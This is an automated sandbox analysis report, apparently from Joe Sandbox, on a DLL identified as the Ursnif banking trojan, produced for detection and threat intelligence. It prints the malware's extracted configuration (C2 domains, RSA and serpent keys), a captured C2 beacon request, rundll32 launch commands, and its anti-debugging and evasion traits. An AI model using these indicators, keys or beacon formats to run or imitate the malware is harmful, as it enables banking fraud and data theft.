Windows Analysis Report 5.dll

Overview

General Information

Sample Name: 5.dll
Analysis ID: 445164
MD5: fceb6a51be4205d11be1491f6e263cae
SHA1: 0abb60d37fac49912172c5385ff58e049520eb53
SHA256: c521dd937ce9b2e8bda2fa915bae5b5be0e150a8b82e3b2bfb1cdbc60a8326c4
Tags: dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Machine Learning detection for sample
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000003.368989675.0000000000900000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Multi AV Scanner detection for submitted file
Source: 5.dll Virustotal: Detection: 22% Perma Link
Machine Learning detection for sample
Source: 5.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: 5.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: 5.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, rundll32.exe

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49721 -> 40.97.116.82:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49721 -> 40.97.116.82:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.97.144.2 52.97.144.2
Source: Joe Sandbox View IP Address: 40.97.116.82 40.97.116.82
Source: global traffic HTTP traffic detected: GET /grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa3C/uHqcEARrcPcZDk3/M6E_2BTZS_2BVaLqj4/34AYxwikF/REm_2FMb1QNTSjBFb_2F/tvRFv4olV4RM6PFjWcs/Yxi4zCvrQiijB3JFDfkmao/_2Ff4LrwOirbu/dGY1O2o_/2BPYCJyNgelsd4Jc6x2/N.grow HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: outlook.com
Source: ~DF3A99C7AD2702480D.TMP.24.dr, {BD6AF35E-DF4A-11EB-90E5-ECF4BB570DC9}.dat.24.dr String found in binary or memory: https://outlook.office365.com/grower/GwIQZ7VTU_2B0dEDGXi3usO/98Jy_2Fhjs/9ADdwnOA_2BxxHdxk/bJ6tUkE3rK
Source: ~DFBADD8EC8FEBD51BA.TMP.24.dr, {BD6AF35C-DF4A-11EB-90E5-ECF4BB570DC9}.dat.24.dr String found in binary or memory: https://outlook.office365.com/grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1A44 NtMapViewOfSection, 0_2_6DDC1A44
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1996 GetProcAddress,NtCreateSection,memset, 0_2_6DDC1996
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC23A5 NtQueryVirtualMemory, 0_2_6DDC23A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A75A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_02A75A27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7B1A5 NtQueryVirtualMemory, 3_2_02A7B1A5
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC2184 0_2_6DDC2184
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDE17B0 0_2_6DDE17B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF05E5 0_2_6DDF05E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF0DB8 0_2_6DDF0DB8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDFBE61 0_2_6DDFBE61
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF4E00 0_2_6DDF4E00
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE009C8 0_2_6DE009C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF88B7 0_2_6DDF88B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7888E 3_2_02A7888E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A73EE1 3_2_02A73EE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7AF80 3_2_02A7AF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDE17B0 3_2_6DDE17B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF05E5 3_2_6DDF05E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF0DB8 3_2_6DDF0DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDFBE61 3_2_6DDFBE61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF4E00 3_2_6DDF4E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE009C8 3_2_6DE009C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF88B7 3_2_6DDF88B7
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6DDF3290 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6DDF3290 appears 39 times
Uses 32bit PE files
Source: 5.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal84.troj.winDLL@18/7@6/5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7A65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_02A7A65C
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{BD6AF35A-DF4A-11EB-90E5-ECF4BB570DC9}.dat Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF48F8DB99852E5824.TMP Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition
Source: 5.dll Virustotal: Detection: 22%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Dogwhen
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Sing
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Wholegray
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17418 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\5.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Dogwhen Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Sing Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Wholegray Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17418 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: 5.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, rundll32.exe

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1BAC LoadLibraryA,GetProcAddress, 0_2_6DDC1BAC
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC2173 push ecx; ret 0_2_6DDC2183
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC2120 push ecx; ret 0_2_6DDC2129
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDEDE07 push ecx; ret 0_2_6DDEDE1A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF32D5 push ecx; ret 0_2_6DDF32E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1C347 push eax; ret 0_2_6DE1C3B1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1C400 push eax; ret 0_2_6DE1C3B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7E0C7 push cs; ret 3_2_02A7E0C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7E458 push ds; retf 3_2_02A7E47A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7ABC0 push ecx; ret 3_2_02A7ABC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7E163 push edx; iretd 3_2_02A7E164
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7AF6F push ecx; ret 3_2_02A7AF7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDEDE07 push ecx; ret 3_2_6DDEDE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF32D5 push ecx; ret 3_2_6DDF32E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1C400 push eax; ret 3_2_6DE1C3B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1C347 push eax; ret 3_2_6DE1C3B1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDFAFAC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_6DDFAFAC
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDFAFAC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_6DDFAFAC
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1BAC LoadLibraryA,GetProcAddress, 0_2_6DDC1BAC
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1E2D8 mov eax, dword ptr fs:[00000030h] 0_2_6DE1E2D8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1E207 mov eax, dword ptr fs:[00000030h] 0_2_6DE1E207
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1DE0E push dword ptr fs:[00000030h] 0_2_6DE1DE0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1E2D8 mov eax, dword ptr fs:[00000030h] 3_2_6DE1E2D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1E207 mov eax, dword ptr fs:[00000030h] 3_2_6DE1E207
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1DE0E push dword ptr fs:[00000030h] 3_2_6DE1DE0E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF3484 GetProcessHeap, 0_2_6DDF3484
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDEFEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DDEFEBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDEFEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6DDEFEBA

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1 Jump to behavior
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
